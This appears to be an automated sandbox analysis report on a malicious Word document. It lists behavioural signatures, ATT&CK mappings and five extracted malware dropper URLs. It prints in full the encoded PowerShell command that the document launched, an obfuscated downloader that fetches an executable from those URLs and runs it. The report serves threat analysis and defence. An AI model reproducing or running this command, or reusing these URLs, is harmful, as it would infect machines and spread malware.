Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    144s
  • resource
    win7v191014
  • submitted
    07-01-2020 04:51

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2019_04___REC_0370426885276201___9643537570004881753.doc

  • Sample

    200107-ygwfzyy35j

  • SHA256

    e8ca6c66c79cca9404a9f6a6920ff02010dc799435381a97fd5c57cf0c3abb41

Score
10/10
evasionspywaretrojan

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://xoso.thememanga.com/wp-admin/rqr/
exe.dropper

http://nuochoakichduc.info/wp-admin/HbS7j/
exe.dropper

http://nhasachthanhduy.com/master.class/zrJd/
exe.dropper

http://saphonzee.com/wp-includes/WdGrn8/
exe.dropper

https://tripaxi.com/All/Og86/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Modifies registry class 136 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
    evasionspywaretrojan

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2019_04___REC_0370426885276201___9643537570004881753.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    PID:2036
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -e JABpAEEARABvAEIAQgB3ACAAPQAgACcAOAAwACcAOwAkAG0AYwB3AEEARwBEAGMAeAA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB4AEQAQQBBACcALAAnAEEAQgAnACwAJwBrACcAKQA7ACQAawBBAHcAeABjAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGkAQQBEAG8AQgBCAHcAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGUAeABlACcAKQA7ACQAdQBBADQAQQBBAEEAQgBCAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBqACcALAAnAEEAXwBDAEEAMQAnACkAOwAkAEYAMQB4AFUAQQBBAD0AbgBlAFcALQBPAGAAQgBqAEUAYABDAFQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQBlACcAKwAnAG4AJwArACcAdAAnACkAOwAkAHYAQQBaAFUARABBAEEAQwA9ACgAIgB7ADIAfQB7ADMAfQB7ADIAMgB9AHsAMwA4AH0AewA0ADEAfQB7ADIAOQB9AHsANAAzAH0AewA0ADQAfQB7ADkAfQB7ADEAMgB9AHsAMQA5AH0AewA4AH0AewAxAH0AewAyADgAfQB7ADMANQB9AHsAMQA4AH0AewAyADEAfQB7ADIANgB9AHsANAAwAH0AewAyADcAfQB7ADEAMAB9AHsANAAyAH0AewAzADAAfQB7ADMAMgB9AHsAMgA0AH0AewAwAH0AewAzADEAfQB7ADEANQB9AHsAMQA2AH0AewA2AH0AewA3AH0AewAxADQAfQB7ADEAMQB9AHsANAB9AHsAMQA3AH0AewAyADUAfQB7ADMAMwB9AHsAMQAzAH0AewAzADQAfQB7ADIAMwB9AHsANQB9AHsAMgAwAH0AewAzADkAfQB7ADMANgB9AHsAMwA3AH0AIgAgAC0AZgAgACcAbgB6ACcALAAnAGkAJwAsACcAaAB0AHQAcAAnACwAJwA6AC8ALwB4AG8AcwBvAC4AdAAnACwAJwBXAGQARwByAG4AJwAsACcALwAnACwAJwB3AHAALQBpAG4AYwAnACwAJwBsAHUAJwAsACcAbwBhAGsAaQBjAGgAZAB1AGMALgAnACwAJwBAAGgAJwAsACcAYwBvAG0AJwAsACcALwAnACwAJwB0AHQAcAA6AC8AJwAsACcAcwA6AC8ALwAnACwAJwBkAGUAcwAnACwAJwAuAGMAbwBtACcALAAnAC8AJwAsACcAOAAvACcALAAnAEgAYgBTADcAagAvAEAAaAB0AHQAcAAnACwAJwAvAG4AdQBvAGMAaAAnACwAJwBBAGwAbAAvAE8AJwAsACcAOgAvAC8AbgBoACcALAAnAGgAJwAsACcAcABhAHgAaQAuAGMAbwBtACcALAAnAHQAdABwADoALwAvAHMAYQBwAGgAbwAnACwAJwBAAGgAdAAnACwAJwBhAHMAYQBjAGgAdABoAGEAbgAnACwAJwB1AHkALgAnACwAJwBuAGYAbwAvAHcAcAAtAGEAJwAsACcAcAAtAGEAZAAnACwAJwBhAHMAdABlAHIALgBjAGwAYQBzAHMALwB6AHIAJwAsACcAZQBlACcALAAnAEoAZAAvAEAAaAAnACwAJwB0AHAAJwAsACcAdAByAGkAJwAsACcAZABtAGkAbgAvACcALAAnADYAJwAsACcALwAnACwAJwBlAG0AZQBtAGEAbgBnAGEALgBjAG8AbQAnACwAJwBnADgAJwAsACcAaABkACcALAAnAC8AdwAnACwAJwAvAG0AJwAsACcAbQBpACcALAAnAG4ALwByAHEAcgAvACcAKQAuACIAUwBwAGwAYABJAFQAIgAoACcAQAAnACkAOwAkAFcAdwBvAEEAQwBDAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBBAFgARABVACcALAAnAHIAJwAsACcAQwBEAFEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBjAFEAMQBfAHgAIABpAG4AIAAkAHYAQQBaAFUARABBAEEAQwApAHsAdAByAHkAewAkAEYAMQB4AFUAQQBBAC4AIgBEAGAAbwBgAFcATgBsAE8AYABBAGQAZgBJAEwAZQAiACgAJABZAGMAUQAxAF8AeAAsACAAJABrAEEAdwB4AGMAQQApADsAJABHAHcAXwB4AEEAUQBBAEIAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBBAEMAWABBACcALAAnAEwAJwAsACcAbwBYAEEAJwApADsASQBmACAAKAAoAEcAZQBgAFQAYAAtAGkAVABFAE0AIAAkAGsAQQB3AHgAYwBBACkALgAiAGwARQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwA2ADEAOQA4ACkAIAB7AGkATgBgAFYATwBLAGUALQBpAFQAYABFAG0AIAAkAGsAQQB3AHgAYwBBADsAJABpAFEAQgBVAEEAdwAxAFUAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQAnACwAJwBaAEEAJwAsACcAQQBBADQAVQAnACkAOwBiAHIAZQBhAGsAOwAkAEgAawA0AGsAVQBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBCAGMAVQBCADQAQwAnACwAJwB6ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaAA0AEEAQgA0AEEAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcARABBACcALAAnAFQAXwBCAFEAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:1108

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2036-0-0x00000000062B0000-0x00000000062B4000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2036-1-0x00000000063CC000-0x00000000063D0000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2036-2-0x0000000008F90000-0x0000000008F94000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2036-3-0x00000000063CC000-0x00000000063D0000-memory.dmp
    Filesize

    16KB

    Download
  • memory/2036-5-0x0000000002020000-0x0000000002021000-memory.dmp
    Filesize

    4KB

    Download